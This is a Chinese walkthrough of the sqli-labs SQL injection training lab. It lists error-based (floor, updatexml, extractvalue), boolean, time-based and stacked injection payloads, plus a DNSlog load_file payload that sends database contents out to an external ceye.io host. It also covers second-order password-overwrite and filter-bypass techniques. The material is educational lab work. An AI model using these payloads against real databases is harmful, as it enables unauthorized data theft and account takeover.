sql-lab 通关笔记
sql-lab
less1-4
-
加单引号报错得到报错信息
-
根据报错信息判断闭合条件
-
order by找字段数
-
union select找回显位置
-
找到回显位置正常爆数据
-
相同类型其他关卡
后端代码分析
GET方式获取id,单引号闭合,将查询到的数据输出到页面上
less5-10
-
加单引号得到报错信息
-
根据报错信息判断闭合条件
-
order by找字段数
-
union select没有回显位置
盲注
- 基于floor报错的盲注
原理是利用group by 处理rand 函数进行处理时,会多次对同一列进行查询,返回duplicate key 错误
利用公式
union Select 1,count(*),concat(你希望的查询语句,floor(rand(0)*2))a from information_schema.columns group by a--+
- updatexml报错注入
利用公式
and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)--+
- extractvalue报错注入
利用公式
and extractvalue(1, concat(0x7e, (select @@version),0x7e))--+
updatexml和extractvalue 在MySQL 5.1.5版本及以后版本中用于对XML文件进行处理,当Xpath 路径出错时会报错。
3. 基于bool判断的盲注
利用公式
' or Length(database()) = 8--+
根据页面是否返回正常判断bool判断是否正确。
4. 基于时间的盲注
利用公式
' and if((select length(database())>7)>0,sleep(5),null) --+
sleep()和benchmark()可以用于延时注入,根据页面响应时间判断是否正确。
5. DNSlog平台盲注
DNSlog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。可用于SQL注入中的盲注,XSS盲打,无回显的命令执行,无回显的SSRF,无回显的XXE(Blind XXE)。用于SQL盲注时需要满足secure_file_priv 为空。
利用公式
' and load_file(concat('\\\\',(select database()),'.**.ceye.io\\sql'))--+
sql-lab利用DNSlog平台注入
后端代码分析
GET方式获取id,单引号闭合,如果在数据库中查询到相关信息,返回特定信息作为flag,否则返回数据库错误信息。
less11-14
post 类型联合查询注入
1.判断
2.爆数据
3.后端代码分析
POST方式获取用户名和密码,单引号闭合,并将查询的数据显示在页面上。
post 类型盲注
1.判断
2.爆数据
3.后端代码分析
POST方式获取用户名和密码,单引号闭合,查询的数据不显示在页面上,只显示一个登陆成功的图片。
less15-16
没有错误回显时,可以借助or 1=1或者and 1=1以及order by判断闭合方式,有查询内容回显时也可以借助union select共同判断。
没有错误回显也没有内容回显,不能使用报错注入,只能使用布尔和时间盲注。
- 判断闭合
2.爆数据
3.后端代码分析
POST方式获取用户名和密码,单引号闭合,查询的数据不显示在页面上,只显示一个登陆成功的图片,不显示报错信息。
less17-22
不同注入点的注入类型
注入点在password 处
常见重置密码等数据库更新数据库的情况下
1.判断
2.爆数据
3.后端代码分析
POST方式获取用户名,然后再在更新密码处拼合,所以注入点在password。
注入点在usagent 处
1.注入单引号闭合,不能使用连接符+连接语句,不能使用注释符闭合。
2.后端代码分析
先获取用户名,在将ip信息和usagent信息插入数据库,原查询语句有过滤,所以没有漏洞。
注入点在referer 处
1.注入单引号闭合,不能使用连接符+连接语句,不能使用注释符闭合。
2.后端代码分析
先获取用户名,在将referer信息和usagent信息插入数据库,原查询语句有过滤,所以没有漏洞。
注入点在cookie 处
1.注入单引号闭合,不能使用连接符+连接语句,不能使用注释符闭合。
2.后端代码分析
前面查询用户的数据处做了过滤,后面又通过cookie 查询数据,存在注入。
cookie 注入base64编码
1.注入单引号闭合,不能使用连接符+连接语句,不能使用注释符闭合,对注入语句进行base64编码。
2.后端代码分析
主要对cookie 进行了base64编码
less23-28a
过滤绕过
过滤注释符
1.注入单引号闭合,不能使用注释符,使用and 和or 闭合语句。
2.后端代码分析
过滤了注释符
二次注入绕过过滤
1.注册一个新账号admin’#
2.修改新注册账号admin’# 的密码
3.实际上修改了admin 的密码
4.后端代码分析
通过注释符更新其他用户密码
过滤and和or
1.双写绕过
2.后端代码分析
匹配一次并替换成空格
过滤一大堆
1.and和or双写绕过,单引号闭合代替注释,括号代替空格,盲注
2.后端代码分析
过滤了一大堆
less29-31
两层服务架构,参数污染绕WAF
//blog.csdn.net/m0_54899775/article/details/122156208
less32-37
宽字节注入
1.通过%bf或者其他ascii码大于128的字符进行绕过
2.后端代码分析
addslashes函数转换’ 为’
post 类型宽字节注入
1.将 utf-8 转换为 utf-16 或 utf-32,例如将 ‘转为 utf-16 为 � ‘ ,进行注入
//www.cnblogs.com/bmjoker/p/9134830.html
less38-45
堆叠注入
用户采用PDO编程( POD(PHP Data Object))且没有对参数进行过滤
mysqli_multi_query()函数也可以造成堆叠注入
//blog.csdn.net/weixin_42530572/article/details/106439380
1.堆叠插入一条数据。
2.后端代码分析
使用函数mysqli_multi_query(),可同时执行多条sql语句
post类型堆叠注入
1.堆叠插入一条数据
//bc.twsec.com.cn/sqli1/Less-42/login.php
less46-53
order by语句与limit语句的注入
order by 注入
1.报错注入
2.后端代码分析
order by 后面是注入点,不能使用union select 注入,使用报错注入或盲注
//blog.csdn.net/m0_54899775/article/details/122202855
less54-75
前面的内容,练习巩固。